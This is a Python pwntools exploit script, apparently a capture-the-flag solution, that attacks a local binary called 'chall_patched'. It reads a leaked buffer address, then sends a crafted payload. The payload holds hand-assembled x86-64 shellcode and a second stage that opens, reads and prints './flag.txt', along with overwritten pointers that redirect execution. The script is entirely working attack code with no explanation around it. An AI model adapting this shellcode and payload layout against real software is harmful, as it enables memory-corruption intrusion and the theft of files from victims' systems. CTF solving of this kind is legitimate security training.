from pwn import *

e = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

script = '''
b *main+138
b *vuln+210
'''

p = process("./chall_patched")
#p = gdb.debug("./chall_patched", gdbscript = script)

p.recvuntil(b"Buffer: ")
buf = int(p.recvline()[:-1:], 16)
print(hex(buf))

p.sendlineafter(b"shellcode: ", f"{0x8b0}".encode())

shellcode = b"\x4D\x89\xFE\x49\x81\xC6\x08\x02\x00\x00\x49\x89\x26\x48\xC7\xC7\x00\x00\x00\x00\x48\xC7\xC0\x3C\x00\x00\x00\x0F\x05"
laugh = b"\x68\x78\x74\x00\x00\x48\xB8\x2E\x2F\x66\x6C\x61\x67\x2E\x74\x50\x48\x89\xE7\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x02\x00\x00\x00\x0F\x05\x48\x89\xC7\x48\x89\xE6\x48\x83\xEE\x30\x48\xC7\xC2\x30\x00\x00\x00\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\xC7\xC7\x02\x00\x00\x00\x48\xC7\xC0\x01\x00\x00\x00\x0F\x05"

payload = shellcode.ljust(0x80, b"\x00")
payload += p64(buf + 0x130) + p64(buf)
payload += laugh
payload = payload.ljust(0x200, b"\x90")
payload = payload.ljust(0x800, b"\x00")
payload += p64(buf + 0xf38)
payload = payload.ljust(0x880, b"\x00")
payload += p64(buf + 0x880)
payload = payload.ljust(0x890, b"\x00")
payload += p64(buf + 0x880)
payload = payload.ljust(0x8a8, b"\x00")
payload += b"\x00" * 8

p.send(payload)

p.interactive()
